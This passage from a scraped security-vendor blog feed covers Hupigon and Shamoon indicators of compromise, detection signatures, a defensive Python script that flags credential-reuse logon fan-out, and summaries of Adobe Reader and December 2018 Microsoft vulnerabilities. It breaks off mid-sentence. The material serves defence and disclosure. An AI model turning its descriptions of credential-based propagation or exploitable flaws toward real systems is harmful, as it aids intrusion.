/></a></div><b><br /></b><br /><b>ThreatGrid</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a 
href="https://3.bp.blogspot.com/-cPATesOIsYk/XBP-SikEZDI/AAAAAAAABTU/QcbicV-UjjE-r-PptFZyhD76h6yyOJUxACLcBGAs/s1600/54bf05efacb556c7ed106a9b802619b2f038d1e6b8adbcf4c8d632f8531e68be_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="801" data-original-width="962" height="532" src="https://3.bp.blogspot.com/-cPATesOIsYk/XBP-SikEZDI/AAAAAAAABTU/QcbicV-UjjE-r-PptFZyhD76h6yyOJUxACLcBGAs/s640/54bf05efacb556c7ed106a9b802619b2f038d1e6b8adbcf4c8d632f8531e68be_tg.png" width="640" /></a></div><br /><br /><b>Umbrella</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-1bXxXprfNac/XBP-Y8BR-_I/AAAAAAAABTY/UKcFBwgIWzYeQHdpuwyB75X790oBwP9-QCLcBGAs/s1600/2759147c5b948b705943cc4dfe7932aaeb14bda833ed00a850d1ee5543bac6c3_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="272" data-original-width="870" height="200" src="https://2.bp.blogspot.com/-1bXxXprfNac/XBP-Y8BR-_I/AAAAAAAABTY/UKcFBwgIWzYeQHdpuwyB75X790oBwP9-QCLcBGAs/s640/2759147c5b948b705943cc4dfe7932aaeb14bda833ed00a850d1ee5543bac6c3_umbrella.png" width="640" /></a></div><b><br /></b><br /><b>Malware</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-td94ffkczL4/XBP-emybT1I/AAAAAAAABTg/eXhrp1PoqD4kWJ_odv11zU1jjA8EIMsHwCLcBGAs/s1600/02c58585c45ba7f87a94eb10fda2ad3d1216dae821536c77bd1f53b5b48730cf_malware.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="480" src="https://1.bp.blogspot.com/-td94ffkczL4/XBP-emybT1I/AAAAAAAABTg/eXhrp1PoqD4kWJ_odv11zU1jjA8EIMsHwCLcBGAs/s640/02c58585c45ba7f87a94eb10fda2ad3d1216dae821536c77bd1f53b5b48730cf_malware.png" width="640" /></a></div><br /><br /><h3>PUA.Win.Trojan.Hupigon-6776762-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry 
Keys</b><br /><ul><li>N/A</li></ul><b>Mutexes</b><br /><ul><li>Local\MSCTF.Asm.MutexDefault1</li><li>\BaseNamedObjects\ISPWizard Mutex</li><li>ISPWizard Mutex</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>N/A</li></ul><b>Domain Names</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>N/A</li></ul><b>Files and or directories created</b><br /><ul><li>%WinDir%\ServiceProfiles\LocalService\AppData\Local\lastalive0.dat</li><li>%WinDir%\ServiceProfiles\LocalService\AppData\Local\lastalive1.dat</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpsetup.exe</li><li>%System32%\rnaph.dll</li><li>%LocalAppData%\Temp\tmpsetup.exe</li></ul><b>File Hashes</b><br /><ul><li>0d72d9ee3de3e8ac191444390ba097b471e72fe6ff951b8d77f2107486f1310d</li><li>174751136660fe996a57657e8ec2205ad9a5e9efe8eaa5078b714f5fb51cf9a2</li><li>1edcf0b7e78dd603aaf2900a06bb8f52c38e5648df696caf14f6c39d2d23c4e9</li><li>4d2719868251d27b80b746161fcb2eb78e5ce1927b10c4da5f782ccc51b619e5</li><li>835a2e9ef6349c641ac1e786aae48338c88e76315a2ce4fd4c43903304984093</li><li>a1a60ca213175febdcc3ff1bc578053c563a6d33c40312f46f3118464e2c9b34</li><li>c6f5fcd39af9fe1a342d5b55b09c74c5cc29c666becdc583098e0a09883491c5</li><li>d84e292c72cd96b1d4755881bb7c05bc7f013910f5671c606fe66a1c56a85411</li><li>e1d008fcb364fa01413eb0710ec049f74e791b17ae25d8f27fe857a7ff9aa8f9</li><li>f094e7eea20b73e4513ed141d82eeb96c8f4ba44373483154719ef9bdef07de4</li></ul><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-jTB0CZDwsFQ/Wz-6aknWuhI/AAAAAAAAAbc/XPOsdG7hpfQpz9NPUVylIgNETUHICQ5OwCLcBGAs/s320/amp-email-threatgrid-cws-only.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://2.bp.blogspot.com/-jTB0CZDwsFQ/Wz-6aknWuhI/AAAAAAAAAbc/XPOsdG7hpfQpz9NPUVylIgNETUHICQ5OwCLcBGAs/s320/amp-email-threatgrid-cws-only.png" /></a> </div><br /><h4>Screenshots of 
Detection</h4><b>AMP</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-gzQeTrzD7Bw/XBP-rPrj9dI/AAAAAAAABTs/wAf2mnwS0RkTrJeDSImsy5K4iURQbcCXQCLcBGAs/s1600/d84e292c72cd96b1d4755881bb7c05bc7f013910f5671c606fe66a1c56a85411_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://1.bp.blogspot.com/-gzQeTrzD7Bw/XBP-rPrj9dI/AAAAAAAABTs/wAf2mnwS0RkTrJeDSImsy5K4iURQbcCXQCLcBGAs/s400/d84e292c72cd96b1d4755881bb7c05bc7f013910f5671c606fe66a1c56a85411_amp.png" width="400" /></a></div><b><br /></b><br /><b>ThreatGrid</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-B_A0XkY2nB4/XBP-xv42quI/AAAAAAAABT0/LO2M1gH-HGUpqbLzsfP6X1ggMR2VmvT8QCLcBGAs/s1600/f094e7eea20b73e4513ed141d82eeb96c8f4ba44373483154719ef9bdef07de4_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="599" data-original-width="962" height="398" src="https://3.bp.blogspot.com/-B_A0XkY2nB4/XBP-xv42quI/AAAAAAAABT0/LO2M1gH-HGUpqbLzsfP6X1ggMR2VmvT8QCLcBGAs/s640/f094e7eea20b73e4513ed141d82eeb96c8f4ba44373483154719ef9bdef07de4_tg.png" width="640" /></a></div><br /><br /><b>Malware</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-ouF1EGIPQbE/XBP-5lUZfOI/AAAAAAAABT4/mzTF036ndUs49brrpzu6ycUU-MGzVjBMgCLcBGAs/s1600/1edcf0b7e78dd603aaf2900a06bb8f52c38e5648df696caf14f6c39d2d23c4e9_malware.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="480" src="https://3.bp.blogspot.com/-ouF1EGIPQbE/XBP-5lUZfOI/AAAAAAAABT4/mzTF036ndUs49brrpzu6ycUU-MGzVjBMgCLcBGAs/s640/1edcf0b7e78dd603aaf2900a06bb8f52c38e5648df696caf14f6c39d2d23c4e9_malware.png" width="640" /></a></div><br /><br /><img 
src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/A4O1YSiP_AY" height="1" width="1" alt=""/>2018-12-14T14:20:25.240-05:000https://blog.talosintelligence.com/2018/12/threat-roundup-1207-1214.htmlCisco Coverage for Shamoon 2 & 3http://feedproxy.google.com/~r/feedburner/Talos/~3/mzZEuexBotY/shamoon-2.htmlAMPClamAVCoverageSnort Rulesnoreply@blogger.com (Alexander Chiu)Fri, 14 Dec 2018 08:30:00 PSTtag:blogger.com,1999:blog-1029833275466591797.post-6596414969477575155<div dir="ltr" style="text-align: left;" trbidi="on"><b>Update Dec. 14, 2018 10:30 CST: Added new Shamoon 3 IOCs</b><br /><br /><div class="p1"><span class="s1">Shamoon is a family of destructive malware that Talos has tracked since 2012 and that has previously been associated with attacks against organizations in the oil and gas industry. A newer variant, Shamoon 2, has been used against several compromised organizations and institutions. Throughout 2017, Talos observed an increase in Shamoon 2 activity and responded to ensure our customers remained protected.</span></div><br /><div class="p1"><span class="s1">On Dec. 10, Talos observed a new Shamoon 3 variant (SHA256 c3ab58b3154e5f5101ba74fccfd27a9ab445e41262cdf47e8cc3be7416a5904f) that was uploaded to VirusTotal. While it is unclear where this sample came from, it shares many characteristics with Shamoon 2. Talos once again responded to ensure our customers are protected by all existing coverage mechanisms. </span>
Additionally, Talos will continue to monitor for new developments to ensure our customers remain protected.</div><br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><h2>Propagation</h2></div>Shamoon 2 has been observed targeting very specific organizations and propagating within a network through network enumeration and the use of stolen credentials. Some of these credentials are organization-specific, belonging to individual users or shared accounts; others are the default accounts of products deployed by the targeted organizations. Shared accounts and product default accounts that were never disabled therefore extend the reach of a single compromised host.<br /><a name='more'></a><br /><h2 id="h.wrhqi5bpzu9l">Coverage</h2>Coverage for Shamoon 2 is available through Cisco security products, services, and open source technologies. Note that as this threat evolves, new coverage may be developed and existing coverage adapted or modified. As a result, this post should not be considered authoritative. For the most current information, please refer to your FireSIGHT Management Center or Snort.org.<br /><h3 id="h.yjssgy91vc7n">Snort Rules</h3><ul><li>23893</li><li>23903</li><li>23905-23933</li><li>24127</li><li>40906</li></ul><h3 id="h.wp81wfqpfgrp">ClamAV Signatures</h3><ul><li>Win.Dropper.DistTrack-*</li><li>Win.Trojan.DistTrack.*</li><li>Win.Malware.DistTrack.*</li></ul><h3 id="h.23pv2sjlj8ri">AMP Detection</h3><ul><li>W32.GenericKD:Malwaregen.20c3.1201</li><li>W32.Malwaregen.19nb.1201</li><li>W32.47BB36CD28-95.SBX.TG</li><li>W32.Generic:Malwaregen.20c3.1201</li><li>Win.Malware.DistTrack</li><li>W32.128FA5815C-95.SBX.TG</li><li>W32.C7FC1F9C2B-95.SBX.TG</li><li>W32.EFD2F4C3FE-95.SBX.TG</li><li>W32.010D4517C8-95.SBX.TG</li><li>Win.Malware.DistTrack.Talos</li></ul><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-b0kvoJncIsE/WJDTeRPhWxI/AAAAAAAAAm0/HaBUf4LAYXcQ7kOuqoJsILYj7PT-jqvngCLcB/s1600/12_58_32.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="113" 
src="https://1.bp.blogspot.com/-b0kvoJncIsE/WJDTeRPhWxI/AAAAAAAAAm0/HaBUf4LAYXcQ7kOuqoJsILYj7PT-jqvngCLcB/s200/12_58_32.jpg" width="200" /></a> <a href="https://3.bp.blogspot.com/-z5Ki0VU2MK8/WJDTb7zuTaI/AAAAAAAAAms/9vY7ch_dql0uaRmkbemOJwvVu-IYZCbHgCLcB/s1600/12_53_07%25281%2529.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="113" src="https://3.bp.blogspot.com/-z5Ki0VU2MK8/WJDTb7zuTaI/AAAAAAAAAms/9vY7ch_dql0uaRmkbemOJwvVu-IYZCbHgCLcB/s320/12_53_07%25281%2529.jpg" width="200" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-RgRg0AqfdNA/WJDTeY6pyxI/AAAAAAAAAm4/46F8oH5hxDEHwQ0oHHr4Gj_siLOiXWbxACLcB/s1600/12_58_53.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="111" src="https://1.bp.blogspot.com/-RgRg0AqfdNA/WJDTeY6pyxI/AAAAAAAAAm4/46F8oH5hxDEHwQ0oHHr4Gj_siLOiXWbxACLcB/s200/12_58_53.jpg" width="200" /></a> <a href="https://4.bp.blogspot.com/-1Gw4pB_ZuI4/WJDTeIjcHxI/AAAAAAAAAmw/P9tGrR9NNvwze7l9jEP-sf_X9IITZ9lXQCLcB/s1600/01_06_31.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="112" src="https://4.bp.blogspot.com/-1Gw4pB_ZuI4/WJDTeIjcHxI/AAAAAAAAAmw/P9tGrR9NNvwze7l9jEP-sf_X9IITZ9lXQCLcB/s320/01_06_31.jpg" width="200" /></a></div><h3 id="h.um18f9c45wng">Other Mitigation Strategies</h3>Recent Shamoon 2 activity is a reminder that users and organizations need a comprehensive disaster recovery plan. No one can say for certain whether you will be targeted by destructive malware, but every drive eventually fails. Without a tested system to back up and restore your data, you risk losing it permanently. 
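<br /><br />The propagation pattern described in the Propagation section above, network enumeration followed by authentication with stolen or product-default credentials, leaves a distinctive trace in Windows Security logs: one account producing network logons (event 4624, logon type 3) to many hosts within minutes. The script below is an added example for this post, not Talos code and not part of the original article. The event lines, the account names (including the watchlisted <code>appliance_admin</code>), the CSV layout assumed to come from a log pipeline, and the eight-hosts-in-ten-minutes threshold are all constructed assumptions to be replaced with your own telemetry and tuned per environment.<br /><br />

```python
"""Detection check for credential-reuse fan-out: one account authenticating over
the network to many hosts in a short window, plus any network logon by an account
on a default-account watchlist.

Added example, not Talos code. Fields mirror what Windows Security event 4624
(logon type 3 = network) provides, flattened to CSV by an assumed log pipeline;
the events themselves are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed events: timestamp, account, source workstation, target host, logon type.
SAMPLE_EVENTS = [
    "2018-12-10T02:14:03,CORP\\svc_backup,WS-17,FS-01,3",
    "2018-12-10T02:14:11,CORP\\svc_backup,WS-17,FS-02,3",
    "2018-12-10T02:14:20,CORP\\svc_backup,WS-17,DC-01,3",
    "2018-12-10T02:14:31,CORP\\svc_backup,WS-17,PRT-03,3",
    "2018-12-10T02:14:45,CORP\\svc_backup,WS-17,WS-22,3",
    "2018-12-10T02:14:58,CORP\\svc_backup,WS-17,WS-23,3",
    "2018-12-10T02:15:09,CORP\\svc_backup,WS-17,WS-24,3",
    "2018-12-10T02:15:22,CORP\\svc_backup,WS-17,WS-25,3",
    "2018-12-10T02:15:40,CORP\\svc_backup,WS-17,WS-26,3",
    "2018-12-10T02:15:55,CORP\\svc_backup,WS-17,WS-27,3",
    "2018-12-10T02:20:12,CORP\\appliance_admin,WS-17,NAS-01,3",  # assumed product default account
    "2018-12-10T08:01:00,CORP\\jdoe,WS-04,FS-01,3",               # normal user activity
    "2018-12-10T08:03:00,CORP\\jdoe,WS-04,MAIL-01,3",
    "2018-12-10T09:00:00,CORP\\admin,WS-09,WS-09,2",              # interactive logon, ignored
]

# Assumed watchlist: default accounts of deployed products that should never log on remotely.
DEFAULT_ACCOUNT_WATCHLIST = {"appliance_admin"}

NETWORK_LOGON = 3


def parse_event(line):
    """Split one CSV line into a dict with a real datetime and an int logon type."""
    ts, account, src, dst, logon_type = line.strip().split(",")
    return {"ts": datetime.fromisoformat(ts), "account": account,
            "src": src, "dst": dst, "type": int(logon_type)}


def find_fanout(events, window=timedelta(minutes=10), threshold=8):
    """Return {(account, source): sorted targets} for every (account, source) pair
    whose network logons reach at least `threshold` distinct hosts inside `window`.
    Window and threshold are assumptions; tune them to the environment."""
    by_key = defaultdict(list)
    for e in events:
        if e["type"] == NETWORK_LOGON:
            by_key[(e["account"], e["src"])].append(e)
    hits = defaultdict(set)
    for key, evs in by_key.items():
        evs.sort(key=lambda e: e["ts"])
        lo = 0
        for hi, e in enumerate(evs):
            while e["ts"] - evs[lo]["ts"] > window:   # slide the window start forward
                lo += 1
            targets = {x["dst"] for x in evs[lo:hi + 1]}
            if len(targets) >= threshold:
                hits[key].update(targets)
    return {k: sorted(v) for k, v in hits.items()}


def find_watchlist_logons(events, watchlist=DEFAULT_ACCOUNT_WATCHLIST):
    """Network logons by watchlisted accounts, flagged regardless of volume."""
    return [e for e in events
            if e["type"] == NETWORK_LOGON
            and e["account"].split("\\")[-1].lower() in watchlist]


def run(lines=SAMPLE_EVENTS):
    """Parse the lines and return (fan-out hits, watchlist hits)."""
    events = [parse_event(line) for line in lines]
    return find_fanout(events), find_watchlist_logons(events)


if __name__ == "__main__":
    fanout, watch = run()
    for (account, src), targets in fanout.items():
        print(f"fan-out: {account} from {src} -> {len(targets)} hosts: {', '.join(targets)}")
    for e in watch:
        print(f"watchlist: {e['account']} from {e['src']} -> {e['dst']} at {e['ts']:%H:%M:%S}")
```

Run it against a CSV export of 4624 events with the same five fields. The two checks are deliberately separate: fan-out counting catches a stolen account being sprayed across the network, while the watchlist catches a single logon by a product default account, which volume-based logic alone would miss.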
Ensuring your assets are properly backed up and can be quickly restored is critical should a system become compromised by Shamoon, ransomware, or other destructive malware and require a complete restoration. Because Shamoon spreads with stolen credentials, backups reachable with those same credentials can be destroyed along with the systems they protect; keep at least one copy offline or otherwise isolated, and test restores regularly.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-30f67c6uITw/WJDNmzOBNqI/AAAAAAAAAmc/hinLElV4aY8yhSyj6a2bZLRyUUtVN-ytgCLcB/s1600/image05.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="238" src="https://3.bp.blogspot.com/-30f67c6uITw/WJDNmzOBNqI/AAAAAAAAAmc/hinLElV4aY8yhSyj6a2bZLRyUUtVN-ytgCLcB/s320/image05.png" width="320" /></a></div><br />Advanced Malware Protection (<a href="http://www.cisco.com/c/en/us/support/security/amp-firepower-software-license/tsd-products-support-series-home.html">AMP</a>) is ideally suited to prevent the execution of the malware used by these threat actors.<br /><br /><a href="http://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html">CWS</a> or <a href="http://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html">WSA</a> web scanning prevents access to malicious websites and detects malware used in these attacks.<br /><br /><a href="http://www.cisco.com/c/en/us/products/security/email-security-appliance/index.html">Email Security</a> can block malicious emails sent by threat actors as part of their campaign.<br /><br />The Network Security protection of <a href="http://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html">IPS</a> and <a 
href="http://www.cisco.com/c/en/us/products/security/asa-next-generation-firewall-services/index.html">NGFW</a> have up-to-date signatures to detect malicious network activity by threat actors.<br /><br /><a href="http://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html">AMP Threat Grid</a> helps identify malicious binaries and build protection into all Cisco Security products.<br /><br /><h3>IOCs</h3><br /><b>Shamoon 2</b><br /><br /><div class="p1"><span class="s1">4919436d87d224f083c77228b48dadfc153ee7ad48dd7d22f0ba0d5090b5cf9b</span></div><div class="p1"><span class="s1">5475f35363e2f4b70d4367554f1691f3f849fb68570be1a580f33f98e7e4df4a</span></div><div class="p1"><span class="s1">01a461ad68d11b5b5096f45eb54df9ba62c5af413fa9eb544eacb598373a26bc</span></div><div class="p1"><span class="s1">c7f937375e8b21dca10ea125e644133de3afc7766a8ca4fc8376470277832d95</span></div> <b>Shamoon 3</b><br /><br /><div class="p1"><span class="s1">c3ab58b3154e5f5101ba74fccfd27a9ab445e41262cdf47e8cc3be7416a5904f</span></div><div class="p1"><span class="s1">bd2097055380b96c62f39e1160d260122551fa50d1eccdc70390958af56ac003</span></div><div class="p1"><span class="s1">0694bdf9f08e4f4a09d13b7b5a68c0148ceb3fcc79442f4db2aa19dd23681afe</span></div><div class="p1"><span class="s1">0975eb436fb4adb9077c8e99ea6d34746807bc83a228b17d321d14dfbbe80b03</span></div><div class="p1"><span class="s1">391e7b90bf3f0bfeb2c2602cc65aa6be4dd1c01374b89c4a48425f2d22fe231c</span></div><div class="p1"><span class="s1">ccb1209122085bed5bded3f923835a65d3cc1071f7e4ad52bc5cf42057dd2150</span></div><div class="p1"><span class="s1">dab3308ab60d0d8acb3611bf364e81b63cfb6b4c1783864ebc515297e2297589</span></div><div class="p1"><span 
class="s1">ee084f2c6fd2cc16f613fadd712641b5742489ca87851739dc868b976867858f</span></div><div class="p1"><span class="s1">36414012564b88b5a2dcded39fc5ed22301ea2ef2f455bf697fa97a5925cb721</span></div><div class="p1"><span class="s1">101e74ef7a18d3a790f1d30edc7bd9f4ebf0afb2cb85cffcd5710d0a53df77a6</span></div><div class="p1"><span class="s1">4d4531f0372d4364e3d9b7e6ea13abf241bbc4a4b761f8a2aea67428d0de8d83</span></div> </div>2018-12-14T13:00:13.549-05:000https://blog.talosintelligence.com/2017/01/shamoon-2.htmlVulnerability Spotlight: Adobe Acrobat Reader DC text field remote code execution vulnerabilityhttp://feedproxy.google.com/~r/feedburner/Talos/~3/NBhTL16UJNQ/vulnerability-spotlight-adobe-acrobat.htmlAdobeAdobe Acrobatvuln devvulnerabilitiesvulnerability spotlightnoreply@blogger.com (Jonathan Munshaw)Tue, 11 Dec 2018 12:54:00 PSTtag:blogger.com,1999:blog-1029833275466591797.post-677543578465342980<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-P8KhgoWhlIU/XBKug9FQhtI/AAAAAAAAAA8/AcvenjbTaE0jDPaShGdm0JmiiOCoRTs1gCLcBGAs/s1600/recurring%2Bblog%2Bimages_vuln%2Bspotlight.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 
1em;"><img border="0" data-original-height="501" data-original-width="1001" src="https://2.bp.blogspot.com/-P8KhgoWhlIU/XBKug9FQhtI/AAAAAAAAAA8/AcvenjbTaE0jDPaShGdm0JmiiOCoRTs1gCLcBGAs/s1600/recurring%2Bblog%2Bimages_vuln%2Bspotlight.jpg" /></a></div><i><br /></i><i>Aleksandar Nikolic of Cisco Talos discovered this vulnerability.</i><br /><h3 style="text-align: left;">Executive summary</h3>Adobe Acrobat Reader DC contains a vulnerability that could allow an attacker to remotely execute code on the victim’s machine. If the attacker tricks the user into opening a specially crafted PDF with specific JavaScript, they could cause heap corruption. The user could also trigger this bug if they open a specially crafted email attachment.<br /><br />In accordance with our coordinated disclosure policy, Cisco Talos worked with Adobe to ensure that these issues are resolved and that <a href="https://helpx.adobe.com/security/products/acrobat/apsb18-41.html">an update</a> is available for affected customers.<br /><a name='more'></a><br /><h3 style="text-align: left;">Vulnerability details</h3><b>Adobe Acrobat Reader DC text field value remote code execution vulnerability (TALOS-2018-0704/CVE-2018-19716)</b><br /><br />Adobe Acrobat Reader supports embedded JavaScript in PDFs to allow for more user interaction. However, this gives the attacker the ability to precisely control memory layout, and it poses an additional attack surface. If the attacker tricks the user into opening a PDF with two specific lines of JavaScript code, it will trigger an incorrect integer size promotion, leading to heap corruption. 
It’s possible to corrupt the heap to the point that the attacker could arbitrarily execute code on the victim’s machine.<br /><br />Read the complete vulnerability advisory <a href="http://www.talosintelligence.com/reports/TALOS-2018-0704/">here</a> for additional information.<br /><h3 style="text-align: left;">Versions tested</h3>Talos tested and confirmed that Adobe Acrobat Reader DC 2019.8.20071 is impacted by this vulnerability.<br /><h3 style="text-align: left;">Coverage</h3><a href="https://helpx.adobe.com/security/products/acrobat/apsb18-41.html" style="clear: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="251" data-original-width="1250" height="40" src="https://2.bp.blogspot.com/-EOkheMgPJvY/XBAVWvYkmwI/AAAAAAAAE54/b0mZ0zhMTyg4QMyuisGAHNRpIj65Ve-3gCLcBGAs/s200/patch_availability_available.jpg" width="200" /></a><br />The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. 
For the most current rule information, please refer to your Firepower Management Center or Snort.org.<br /><br />Snort Rules: <a href="https://snort.org/advisories/649">48293, 48294</a><br /></div>2018-12-13T14:19:42.362-05:000https://blog.talosintelligence.com/2018/12/vulnerability-spotlight-adobe-acrobat.htmlMicrosoft Patch Tuesday — December 2018: Vulnerability disclosures and Snort coveragehttp://feedproxy.google.com/~r/feedburner/Talos/~3/ivPs31SzFMM/microsoft-patch-tuesday-december-2018.htmlMicrosoftMicrosoft Patch Tuesdaypatch tuesdaySnortSnort RulesSnort.orgvuln devvulnerabilitiesnoreply@blogger.com (Jonathan Munshaw)Tue, 11 Dec 2018 10:35:00 PSTtag:blogger.com,1999:blog-1029833275466591797.post-4221898786857306236<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-o-bMM_JQczQ/XBKvF5mhu2I/AAAAAAAAABE/DRJvFGzVnH8ODP7dMWLdnhgYbZqlF9Z8QCLcBGAs/s1600/recurring%2Bblog%2Bimages_patch%2Btuesday.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="501" data-original-width="1001" src="https://1.bp.blogspot.com/-o-bMM_JQczQ/XBKvF5mhu2I/AAAAAAAAABE/DRJvFGzVnH8ODP7dMWLdnhgYbZqlF9Z8QCLcBGAs/s1600/recurring%2Bblog%2Bimages_patch%2Btuesday.jpg" /></a></div><br />Microsoft released its monthly security update today, disclosing a variety of vulnerabilities in several of its products. 
The latest Patch Tuesday covers 38 vulnerabilities, nine of which are rated “critical” and 29 that are considered “important.” There are no “moderate” or “low” vulnerabilities in this release.<br /><br />The advisories cover bugs in the Chakra scripting engine, several Microsoft Office products and the Microsoft Internet Explorer web browser.<br /><br />For coverage of these vulnerabilities, check out our Snort blog post on <a href="https://blog.snort.org/2018/12/snort-rule-update-for-dec-11-2018.html">this week's rule update</a>.<br /><br /><a name='more'></a><h3 style="text-align: left;">Critical vulnerabilities</h3><br />Microsoft disclosed nine critical vulnerabilities this month, which we will highlight below.<br /><br /><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8583">CVE-2018-8583</a>, <a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8617">CVE-2018-8617</a>, <a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8618">CVE-2018-8618</a>, <a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8624">CVE-2018-8624</a> and <a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8629">CVE-2018-8629</a> are all memory corruption vulnerabilities in the Chakra scripting engine that could allow an attacker to execute code on the victim machine remotely. All of the bugs lie in the way the scripting engine handles objects in memory in the Microsoft Edge web browser. An attacker could exploit these vulnerabilities by tricking a user into visiting a web page using Microsoft Edge, or by tricking them into clicking on specially crafted content on other sites that accept user-created content.<br /><br /><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8540">CVE-2018-8540</a> is a remote code injection vulnerability in the Microsoft .NET framework. 
An attacker can exploit this flaw by passing a specific input to an application utilizing vulnerable .NET methods. If successful, the attacker could take control of an affected system.<br /><br /><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8626">CVE-2018-8626</a> is a remote code execution vulnerability that exists in Windows DNS servers when they fail to properly handle requests. An attacker could run arbitrary code on an affected system if they exploit the vulnerability by sending malicious requests to a Windows DNS server. Windows servers that are configured as DNS servers are susceptible to this vulnerability.<br /><br /><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8631">CVE-2018-8631</a> is a remote code execution vulnerability in Internet Explorer. The bug lies in the way the web browser accesses objects in memory. An attacker could exploit this bug by tricking a user into visiting a specially crafted, malicious web page in Internet Explorer. If successful, the attacker could execute arbitrary code in the context of the current user.<br /><br /><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8634">CVE-2018-8634</a> is a memory corruption vulnerability in Microsoft Edge that exists when the web browser improperly handles objects in memory. 
An attacker who successfully exploits this flaw by tricking a user into visiting a malicious, specially crafted web page could gain the ability to execute arbitrary code on the machine in the context of the current user.<br /><h3 style="text-align: left;">Important vulnerabilities</h3>This release also contains 29 important vulnerabilities, eight of which we will highlight below.<br /><br /><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8597">CVE-2018-8597</a> and <a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8636">CVE-2018-8636</a> are remote code execution vulnerabilities in Microsoft Excel that exist when the software fails to properly handle objects in memory. An attacker can exploit these bugs by tricking the user into opening a specially crafted Excel file, either via the web or as an email attachment. If successful, the attacker could gain the ability to execute arbitrary code on the system in the context of the current user.<br /><br /><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8587">CVE-2018-8587</a> is a remote code execution vulnerability in Microsoft Outlook that exists when the software fails to properly handle objects in memory. An attacker could exploit this vulnerability by tricking the user into opening a specially crafted email attachment while using the Outlook client. If successful, the attacker could use a specially crafted file to perform actions in the security context of the current user. For example, the file could act on behalf of the logged-on user with the same permissions as the current user.<br /><br /><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8590">CVE-2018-8590</a> is a remote code execution vulnerability in Microsoft Word that exists when the software fails to properly handle objects in memory. 
An attacker could exploit this vulnerability by tricking the user into opening a malicious, specially crafted Word document, either via email, the web, or another vector.<br /><br /><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8619">CVE-2018-8619</a> is a remote code execution vulnerability that exists when the Internet Explorer VBScript execution policy improperly restricts VBScript in certain scenarios. An attacker could use this vulnerability to run arbitrary code with the permissions of the current user. A user could trigger this vulnerability if they visited a specially crafted web page using Internet Explorer.<br /><br /><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8625">CVE-2018-8625</a> is a remote code execution vulnerability in the VBScript engine. The vulnerability could corrupt memory in such a way that an attacker could execute code in the context of the current user. An attacker could trigger this flaw by tricking the user into visiting a specially crafted website on Internet Explorer. Additionally, they could embed an ActiveX control marked “safe for initialization” in an application or Microsoft Office document that 